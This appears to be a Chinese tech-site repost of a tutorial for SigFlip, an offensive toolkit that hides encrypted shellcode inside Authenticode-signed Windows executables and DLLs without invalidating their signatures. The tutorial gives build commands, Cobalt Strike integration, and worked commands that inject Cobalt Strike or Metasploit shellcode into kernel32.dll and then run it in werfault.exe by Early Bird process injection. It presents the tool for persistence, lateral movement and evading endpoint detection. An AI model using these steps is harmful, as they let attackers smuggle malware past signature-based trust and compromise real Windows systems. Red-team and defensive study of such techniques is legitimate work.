关于SigFlip
SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。换句话来说,就是我们可以使用SigFlip向PE文件中嵌入数据(比如Shellcode),并且再不会破坏文件签名、完整性检查或PE文件功能的情况下,修改PE文件的校验和或哈希。
SigInject组件可以将Shellcode注入至PE文件的[WIN_CERTIFICATE]证书表中,并输出加密密钥以便配合BOF/C/C#加载器(SigLoader)一起使用。SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。
SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。
SigFlip将检查PE哈希是否已成功更改,然后退出以绕过终端针对此类行为的检查。
SigFlip可以用于持久化感染、横向渗透以及命令/代码执行等场景。
注意事项:igFlip、SigInject和SigLoader将以BOF脚本和.NET程序集提供。
工具安装
广大研究人员可以使用下列命令将该项目源码克隆至本地:
gitclonehttps://github.com/med0x2e/SigFlip.git
工具构建/编译
本项目并没有提供预编译的BOF,我们可以使用Mingw-w64来进行编译。如果是.NET,可以使用VS或csc.exe来编译.NET项目(SigFlip、SigLoader);如果是BOF,请按照下列步骤操作:
➜i686-w64-mingw32-gcc-csigflip.c-osigflip.x86.o ➜x86_64-w64-mingw32-gcc-csigflip.c-osigflip.x64.o ➜x86_64-w64-mingw32-gcc-cSigLoader/sigloader.c-osigloader.x64.o ➜i686-w64-mingw32-gcc-cSigLoader/sigloader.c-osigloader.x86.o
确保所有的对象文件都存储在sigflip.cna的相同目录下,然后在Cobalt Strike中加载sigflip.cna。
注意事项:预编译的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能会出现崩溃的情况。
Cobalt Strike
执行程序集:
execute-assemblySigFlip.exe-h execute-assemblySigLoader-h
BOF:
当我们在Cobalt Strike中加载sigflip.cna了之后,将会注册两个新命令,我们此时就能够以下列方式使用SigFlip和SigInject了。
- SigFlip:在不破坏签名或证书有效性的情况下,修改PE文件哈希:
SigFlip"<PE\_FILE\_PATH>""<OUTPUT\_PE\_FILE\_PATH(withextension)>"
- SigInject:向PE文件的[WIN_CERTIFICATE]证书表中注入加密的Shellcode,打印的加密密钥可以跟基础C/C#加载器结合使用以保证签名和证书的完整性:
SigInject"<PE\_FILE\_PATH><OUTPUT\_PE\_FILE\_PATH(withextension)>""<SHELLCODE\_FILE>"
- SigLoader:从PE文件中加载由SigInject加密的Shellcode,然后使用Early Bird向指定进程注入Shellcode,我们可以自定义Shellcode的注入逻辑,或直接替换目标代码:
SigLoader<PE_FILE_PATH_WITH_SH><DECRYPTION_KEY><SPAWNTO_PROCESS_PATH><PARENT_PROCESS_ID>
工具使用样例
(1) BOF
向msbuild.exe注入随机数据:
SigFlip"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe""C:\lolbins\modified-msbuild.exe"
向kernel32.ell注入Shellcode:
SigInject"C:\Windows\System32\kernel32.dll""C:\random\modified-kernel32.dll""C:\shellcode\cobaltstrike_or_msf_shellcode.bin" Sigloader"C:\random\modified-kernel32.dll""DECRYPTION_KEY""C:\Windows\System32\werfault.exe"6300
(2) 执行程序集
向msbuild.exe注入随机数据:
execute-assemblySigFlip.exe-bC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe-oC:\Temp\MSBuild.exe
向kernel32.ell注入Shellcode:
execute-assemblySigFlip.exe-iC:\Windows\System32\kernel32.dll-sC:\Temp\x86shellcode.bin-oC:\Temp\kernel32.dll-eTestSecretKey execute-assemblySigLoader.exe-fC:\Temp\modified-kernel32.dll-eTestSecretKey-pid2354
项目地址
SigFlip:【GitHub
转载请注明:IT运维空间 » 安全防护 » 如何使用SigFlip篡改身份认证码签名的PE文件
发表评论